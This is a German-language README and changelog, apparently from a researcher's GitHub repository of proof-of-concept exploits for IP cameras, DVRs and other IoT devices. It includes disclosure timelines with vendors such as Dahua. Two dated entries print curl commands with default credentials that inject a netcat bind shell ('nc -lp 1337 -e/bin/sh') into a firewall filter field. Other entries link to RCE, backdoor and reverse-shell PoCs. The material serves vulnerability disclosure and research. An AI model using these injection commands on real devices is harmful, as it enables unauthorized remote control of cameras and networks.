
Issues has been disabled for these PoC's, as they are simply PoC, Public Domain and unsupported.
Verschiedene PoCs - Internet der (Un)Sicherheits-Dinge
Es lohnt sich, über diese miesen (un)sicheren Dinge zu lesen: https://ipvm.com/reports/security-exploits
2021-10-19
Alle Credits an Watchful_IP (https://watchfulip.github.io/)
https://github.com/mcw0/PoC/blob/master/CVE-2021-36260.py
2021-10-06
Details: https://github.com/mcw0/PoC/blob/master/Dahua%20authentication%20bypass.txt
PoC: https://github.com/mcw0/DahuaConsole
2021-09-06
Zwei unabhängige Umgehungen der Authentifizierung.
Aufgrund des sehr hohen Potenzials eines weiteren "Dahua-Massen-Hacks" werde ich die Full-Disclosure-Details bis zum 6. Oktober 2021 zurückhalten.
Es wird dringend empfohlen, die Firmware bis dahin zu aktualisieren.
https://www.dahuasecurity.com/support/cybersecurity/details/957
2020-05-09
https://github.com/mcw0/PoC/blob/master/Dahua-3DES-IMOU-PoC.py
2020-02-29
https://github.com/mcw0/Tools/blob/master/Dahua-JSON-Debug-Console-v2.py
2020-02-15
Im Laufe dieser Woche wurde Kontakt mit dem Dahua PSIRT aufgenommen. Details, PoC und Nachweise für 23 verschiedene Cloud-Anbieter wurden bereitgestellt. Ich werde mich außerdem an das neue Vorgehen von Google Zero 'Policy and Disclosure: 2020 Edition' halten (da es für mich Sinn ergibt), das heißt, ich werde nach 90 Tagen veröffentlichen, unabhängig davon, ob Dahua Updates vor oder nach dem 09.05.2020 19:00 UTC (9. Mai 2020, 19:00 UTC) veröffentlicht.
Dahua, bitte behebt das und stellt Updates vor diesem Datum bereit ...
Referenz: Google Zero 'Policy and Disclosure: 2020 Edition': https://googleprojectzero.blogspot.com/2020/01/policy-and-disclosure-2020-edition.html
2020-02-10
Ich habe gerade Zugangsdaten-Leaks (die im Klartext enden) aus dem Dahua SDK an das Dahua PSIRT gemeldet. Mal sehen, wie sie diese Informationen aufnehmen. Ziemlich übel, wenn mehr als 20 verschiedene Cloud-Anbieter betroffen sind ... 90 Tage laufen ab heute.
2020-01-20
Neues Repository erstellt, in das ich einige Tools einstellen möchte.
Als Erstes: Dahua-JSON-Debug-Console-v2.py
2019-10-06 (alte Sachen)
Anonym Modell und Firmware-Version von Axis-Geräten erkennen (1998 - 2019).
https://github.com/mcw0/PoC/blob/master/axis-detect.py
2019-08-20
https://github.com/mcw0/PoC/blob/master/Realtek-RTL83xx-PoC.py
2019-08-06
https://www.vdoo.com/blog/disclosing-significant-vulnerabilities-network-switches
Alle technischen Details zusammen mit dem Python-PoC werden hier am 20. August 2019 veröffentlicht.
2019-05-15
Mehrere Stack-Overflows, RCE, Offenlegung von Benutzername/Passwort im Klartext und mehr
https://github.com/mcw0/PoC/blob/master/LifeSafetyPower-Netlink-PoC.py
2019-04-10
Dieses Skript verwendet das binäre P2P-Protokoll "DHIP" von Dahua, das auf normalen HTTP/HTTPS-Ports und TCP/5000 funktioniert
Es verbindet sich mit der internen "Debug-Konsole" von Dahua-Geräten über JSON (gleiche Art wie das frühere Debug auf TCP/6789)
https://github.com/mcw0/PoC/blob/master/Dahua-DHIP-JSON-Debug-Console.py
Viel Spaß, bashis
2019-01-23
Grüße, lange nichts veröffentlicht ...
Ich bin immer noch da und betreibe meine Forschung, aber die Neuigkeit ist, dass ich versuche, mit VDOO (https://www.vdoo.com/) für das Vendor-Management zusammenzuarbeiten, und das hat meinen Full-Disclosure-Prozess leider etwas verzögert ...
Wie auch immer, es stehen einige interessante Untersuchungen als Full Disclosure hier auf meinem GitHub an.
Durch die Zusammenarbeit mit VDOO kann ich das tun, was ich gerne mache, und muss keine Zeit mit den Herstellern verschwenden, die (nicht wollen | nicht verstehen | ignorieren wollen | verzögern wollen | was auch immer).
Das Neueste sind einige Reolink-Sachen (https://reolink.com/), die Sie hier finden: https://www.vdoo.com/blog/working-with-the-community-%E2%80%93-significant-vulnerabilities-in-reolink-cameras/.
2018-06-18
AVTECH {DVR/NVR/IPC} Heap Overflow, IPCP API, RCE
https://github.com/mcw0/PoC/blob/master/Avtech_Undocumented_API_and_RCE.txt
https://github.com/mcw0/PoC/blob/master/AVTECH-IPCP-RCE.py
2018-06-03
Reolink {IPC} RCE (Authenticated)
https://github.com/mcw0/PoC/blob/master/Reolink-IPC-RCE.py
2018-04-09
Shenzhen TVT Digital Technology Co. Ltd & OEM {DVR/NVR/IPC} API RCE https://github.com/mcw0/PoC/blob/master/TVT_and_OEM_IPC_NVR_DVR_RCE_Backdoor_and_Information_Disclosure.txt https://github.com/mcw0/PoC/blob/master/TVT-PoC.py
2018-03-05
AVTECH {DVR/NVR/IPC} Authenticated RCE
https://github.com/mcw0/PoC/blob/master/AVTECH-RCE.py
2018-02-01
Geovision Inc. IP-Kamera/Video/Zutrittskontrolle - Mehrfache Remote-Befehlsausführung - Mehrfacher Stack-Overflow - Double-free - Unbefugter Zugriff https://github.com/mcw0/PoC/blob/master/Geovision%20IP%20Camera%20Multiple%20Remote%20Command%20Execution%20-%20Multiple%20Stack%20Overflow%20-%20Double%20free%20-%20Unauthorized%20Access.txt
Geovision Inc. IP-Kamera & Video-Server Remote-Befehlsausführung PoC https://github.com/mcw0/PoC/blob/master/Geovision-PoC.py
2018-01-22
Der Herospeed-TelnetSwitch-Daemon läuft auf TCP/787 und ermöglicht das Aktivieren des telnetd. Ein kleiner Stack-Overflow erlaubt es uns, das dynamisch generierte Passwort zu überschreiben und telnetd zu aktivieren. https://github.com/mcw0/PoC/blob/master/Herospeed-TelnetSwitch.py
2018-01-15
Kleiner OpenSSL-Wrapper, um verschiedene Verschlüsselungsschlüssel/Digests und Chiffren an Foscam-IPC-Firmware-Images zu testen. https://github.com/mcw0/PoC/blob/master/decrypt-foscam.py
Deobfuskiere Strings/Login/Passwort/Crypto-Key in verschiedenen Foscam-IPC-Binaries und Bibliotheken https://github.com/mcw0/PoC/blob/master/deobfuscate-foscam.py
2017-12-22
https://github.com/mcw0/PoC/blob/master/Vitek_RCE_and_information_disclosure.txt
2017-12-14
https://github.com/mcw0/PoC/blob/master/Remote_Stack_Format_String_multiple%20OEM.txt
2017-12-05
https://github.com/mcw0/PoC/blob/master/tiny-w3-mcw.c
2017-12-03
// Enable 'IP Filter'
curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=2"
// Add to 'IP Filter' and execute
curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/AddIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"
// Disable 'IP Filter'
curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=0"
// Remove from 'IP Filter'
curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/DeleteIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"
2017-12-03
// Enable 'IP Filter'
curl --user admin:admin -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=2"
// Add to 'IP Filter' and execute
curl --user admin:admin -v -X POST http://[IP:PORT]/form/AddIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"
// Disable 'IP Filter'
curl --user admin:admin -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=0"
// Remove from 'IP Filter'
curl --user admin:admin -v -X POST http://[IP:PORT]/form/DeleteIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"
Hinweis: Ich bin mir ziemlich sicher, dass es weitere OEMs gibt, die dasselbe verwenden.
2017-12-01 Axis Communications MPQT/PACS Heap-Overflow und Informationsleck https://github.com/mcw0/PoC/blob/master/Axis_Communications_MPQT_PACS_Heap_Overflow_and_information_leakage.txt
2017-11-13 Reverse-Stunnel-TLSv1-Privacy-Shell https://github.com/mcw0/PoC/blob/master/Reverse%20stunnel%20TLSv1%20privacy%20shell.txt
2017-11-13 Vivotek IP-Kameras - Remote-Stack-Overflow https://github.com/mcw0/PoC/blob/master/Vivotek%20IP%20Cameras%20-%20Remote%20Stack%20Overflow.txt
2017-10-29 Uniview RCE und Export-Konfigurations-PoC https://github.com/mcw0/PoC/blob/master/Uniview%20RCE%20PoC.txt
2017-10-19 Ein altes, vergessenes Fuzzing aus Q3/2016, das zu RCE führte (PoC: Remote-Connect-Back-Shell) und zum remote Auslesen von /etc/shadow. Wurde an Axis gemeldet und in Q3/2016 behoben. Ich poste es trotzdem hier, da es ein guter Hinweis sein könnte. https://github.com/mcw0/PoC/blob/master/Axis%20SSI%20RCE
2017-10-17 Telnetd in Dahua aktivieren / deaktivieren (für neuere Firmware-Versionen) https://github.com/mcw0/PoC/blob/master/dahua-telnetd-json.py
2017-05-03
Öffentliche Wiederveröffentlichung des Dahua-Backdoor-PoCs https://github.com/mcw0/PoC/blob/master/dahua-backdoor-PoC.py
2017-03-20
Mit meinem neu gewonnenen Wissen über anfällige Geräte da draußen – eine unglaubliche Zahl von mehr als 1 Million Dahua-/OEM-Einheiten – wobei das Wissen aus einem Bericht von NSFOCUS und meiner eigenen Recherche auf shodan.io stammt.
Mit diesem Wissen werde ich den Python-PoC nicht wie zuvor für den 5. April angekündigt öffentlich veröffentlichen, da dies nicht notwendig ist, wenn der PoC bereits von IPVM und anderen unabhängigen Sicherheitsforschern verifiziert wurde.
Ich bin jedoch offen dafür, den PoC mit ernsthaften Sicherheitsforschern zu teilen, falls gewünscht. Bitte senden Sie mir eine E-Mail außerhalb der Liste und seien Sie deutlich, wer Sie sind, damit ich Sie nicht für einen Bittsteller halte, den ich ignoriere.
NSFOCUS-Bericht: http://blog.nsfocus.net/dahua-cameras-unauthorized-access-vulnerability-technical-analysis-solution/
/bashis
Haben Sie die Datums- und Zeitstempel auf Dahuas Patches bemerkt? Schauen Sie sich die Screenshots an von http://us.dahuasecurity.com/en/us/Security-Bulletin_030617.php https://github.com/mcw0/PoC/blob/master/Dahua%20Wiki%20Firmware%20Timestamp.png
https://dahuawiki.com/images/Firmware/DVR/Q2.2017/ https://github.com/mcw0/PoC/blob/master/Dahua%20Wiki%20Firmware%20listing.png
Nicht nur NVR/DVR/IPC/HDCVI stehen auf der Liste
Auch Gegensprechanlagen, VTO2000A wurde bestätigt http://www1.dahuasecurity.com/au/products/vto2000a-762.html